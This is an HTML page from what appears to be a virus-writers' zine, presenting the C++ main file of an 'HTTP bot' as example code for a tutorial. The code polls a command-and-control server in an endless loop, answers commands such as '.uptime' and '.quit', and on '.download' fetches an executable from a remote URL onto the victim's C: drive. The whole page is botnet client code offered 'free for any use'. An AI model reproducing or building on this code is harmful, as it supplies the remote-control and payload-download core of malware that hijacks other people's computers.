<html><head><title>EOF ISSUE #0x01</title>
<style fprolloverstyle>A:hover {color: #D1F2C4; text-decoration: none}</style></head>
<body text="#E0E0E0" bgcolor="#131313" link="#BFBFBF" vlink="#BFBFBF" alink="#BFBFBF" style="font-size: 10pt">

<pre><hr>|| Author: RadiatioN/EOF || <a style="text-decoration: none" href="../mainmenu/sources.htm"><span style="text-decoration: none">Back to sources</span></a> || <a style="text-decoration: none" target="_blank" href="../binsrc/RadiatioN/HttpBot"><span style="text-decoration: none; color: #BFBF88">View project folder</span></a> || <hr></pre>
<pre>
// HttpBots.cpp : Defines the entry point for the application.
//

/*

Example code to tutorial &quot;Http Bots - the new state of the art&quot;

No Copyright - free for any use

Written by RadiatioN in August-November 2006

Zine and group site:
EOF - Electrical Ordered Freedom
http://www.eof-project.net

My site:
RadiatioN's VX World
http://radiation.eof-project.net

Contact:
radiation[at]eof-project[dot]net

some nice greetings to Sky my good friend :)

*/

#include &quot;stdafx.h&quot;


int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
	char szCommand[512]=&quot;&quot;;
	//create a intance of the class
	CHttpBot bla;

	//init all values and start message handling
	bla.SetServerUrl(&quot;http://www.example.com/&quot;);
	bla.SetTimeout(2500);
	bla.StartMessageHandling();

	//for example like a never endling loop to check for commands from the server
	while(1)
	{
		//get a command from webconsole
		if(bla.GetCommandFromQueue(szCommand))
		{
			//parse your commands here received from the server
			if(strcmp(szCommand, &quot;.quit&quot;)==0)
			{
				break;
			}
			else if(strcmp(szCommand, &quot;.uptime&quot;)==0)
			{
				//in this way you can send replys to the server
				bla.AddResultToSend(&quot;I'm up for &lt;time&gt; ;)&quot;);
			}
			else if(strcmp(szCommand, &quot;.download&quot;)==0)
			{
				DownloadFile(&quot;http://example.com/MyNewVersion.exe&quot;, &quot;C:\\MyNewVersion.exe&quot;);
			}			
		}

		//wait, so CPU is not at 100%
		Sleep(1000);
	}

	return 0;
}
</pre></body></html>